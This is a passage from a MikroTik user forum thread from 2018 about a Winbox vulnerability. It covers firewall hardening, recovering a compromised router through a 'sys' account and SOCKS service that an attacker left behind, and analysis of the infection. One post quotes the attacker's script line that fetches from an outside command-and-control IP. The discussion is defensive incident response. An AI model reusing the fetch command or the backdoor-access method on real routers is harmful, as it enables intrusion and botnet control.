Also when I do secure http and winbox services using IP, I can not see any log from the RouterOS that someone not on that IP(range) tries to log inn. This should be logged as I can do with a normal FW/Nat/Mangle rule. I would then be able to see if my security upgrade does help me!!
 
gotsprings
Long time Member
Long time Member
Posts: 571
Joined: Mon May 14, 2012 9:30 pm

Re: Winbox vulnerability: please upgrade

Tue Aug 07, 2018 4:48 pm

- Implement a good firewall according to the article here: https://wiki.mikrotik.com/wiki/Manual:S ... our_Router
When you setup a default NAT, it looks like that all service port are blocked from the outside.
Do I still need to specify for where Windbox should be allowed?
/ip service set winbox address=192.168.88.0/24
I only have two user on the net, me and my wife :)

Also when I do secure http and winbox services using IP, I can not see any log from the RouterOS that someone not on that IP(range) tries to log inn. This should be logged as I can do with a normal FW/Nat/Mangle rule. I would then be able to see if my security upgrade does help me!!
Add this to your firewall.

/ip firewall filter add chain=input src-address=!192.168.88.0/24 proto=tcp dst-port=8291 action=passthrough log=yes log-prefix="Winbox External Probe" place-before=1

That would give you a counter and log entry
"It ain't what you don't know that gets you into trouble. It's what you know for sure that just ain't so."
Mark Twain
 
kobuki
Member Candidate
Member Candidate
Posts: 123
Joined: Sat Apr 02, 2011 5:59 pm

Re: Winbox vulnerability: please upgrade

Tue Aug 07, 2018 8:06 pm

2. I have try to login to remote mikrotik with that password but no success so I think the problem come from the hacker allow only IP 127.0.0.1 to login with "sys" account.
And the hacker use script to disable hard reset, so I just ask can I use the serial cable to login. (infected router is still locate on other place)
If you haven't figured it out yet, you could try connecting to 127.0.0.1 on your router using the socks service which has probably been enabled on your device by the attacker. That assumes you've already hacked the 'sys' user's password.
 
User avatar
Jotne
Member
Member
Posts: 473
Joined: Sat Dec 24, 2016 11:17 am

Re: Winbox vulnerability: please upgrade

Tue Aug 07, 2018 10:12 pm


/ip firewall filter add chain=input src-address=!192.168.88.0/24 proto=tcp dst-port=8291 action=passthrough log=yes log-prefix="Winbox External Probe" place-before=1

That would give you a counter and log entry
Thanks, did not think of that :)
 
aswin
just joined
Posts: 5
Joined: Tue Jul 11, 2017 6:26 pm

Re: Winbox vulnerability: please upgrade

Wed Aug 08, 2018 2:11 am

2. I have try to login to remote mikrotik with that password but no success so I think the problem come from the hacker allow only IP 127.0.0.1 to login with "sys" account.
And the hacker use script to disable hard reset, so I just ask can I use the serial cable to login. (infected router is still locate on other place)
If you haven't figured it out yet, you could try connecting to 127.0.0.1 on your router using the socks service which has probably been enabled on your device by the attacker. That assumes you've already hacked the 'sys' user's password.
Thank you kobuki for your suggestion. Perfect!! Now I can remote login to the infected router with user "sys" via SOCK
Thank you again. It can save a lot of time for me instead of requesting client to send router back to me .
 
kobuki
Member Candidate
Member Candidate
Posts: 123
Joined: Sat Apr 02, 2011 5:59 pm

Re: Winbox vulnerability: please upgrade

Wed Aug 08, 2018 2:17 am

Now I can remote login to the infected router with user "sys" via SOCK
Good! Thanks for the feedback. Your attacker was a particularly malicious one, almost locking you out completely. Almost.
 
excession
just joined
Posts: 17
Joined: Mon May 11, 2015 8:16 pm

Re: Winbox vulnerability: please upgrade

Wed Aug 08, 2018 2:41 am

Thats it! THX!

In scripts are
/tool fetch address=95.154.216.163 port=2008 src-path=/mikrotik.php mode=http
Does anyone have the contents of the payload they can post? I've tried hitting the above but it's 404ing now.

Thanks
I grabbed the PHP file before fixing my router. I opened it with notepad and it was completely blank......
Interesting thanks, I wonder then if the empty file is just a byproduct of the fetch command and the point is to execute the PHP file on that web server rather than download it. Perhaps it’s part of the command and control system and by calling this file the router is checking in. Certainly such a call would provide a loggable IP address.
 
kobuki
Member Candidate
Member Candidate
Posts: 123
Joined: Sat Apr 02, 2011 5:59 pm

Re: Winbox vulnerability: please upgrade

Wed Aug 08, 2018 2:44 am

It was empty where I checked, too. It's possibly just a presence indicator in the swarm for the C&C as you also mentioned...
 
excession
just joined
Posts: 17
Joined: Mon May 11, 2015 8:16 pm

Re: Winbox vulnerability: please upgrade

Wed Aug 08, 2018 2:45 am

2. I have try to login to remote mikrotik with that password but no success so I think the problem come from the hacker allow only IP 127.0.0.1 to login with "sys" account.
And the hacker use script to disable hard reset, so I just ask can I use the serial cable to login. (infected router is still locate on other place)
If you haven't figured it out yet, you could try connecting to 127.0.0.1 on your router using the socks service which has probably been enabled on your device by the attacker. That assumes you've already hacked the 'sys' user's password.
Smart idea. Is he trying to use Winbox to connect and if so how would you route a Winbox connection through a socks proxy?

Who is online

Users browsing this forum: netispguy and 9 guests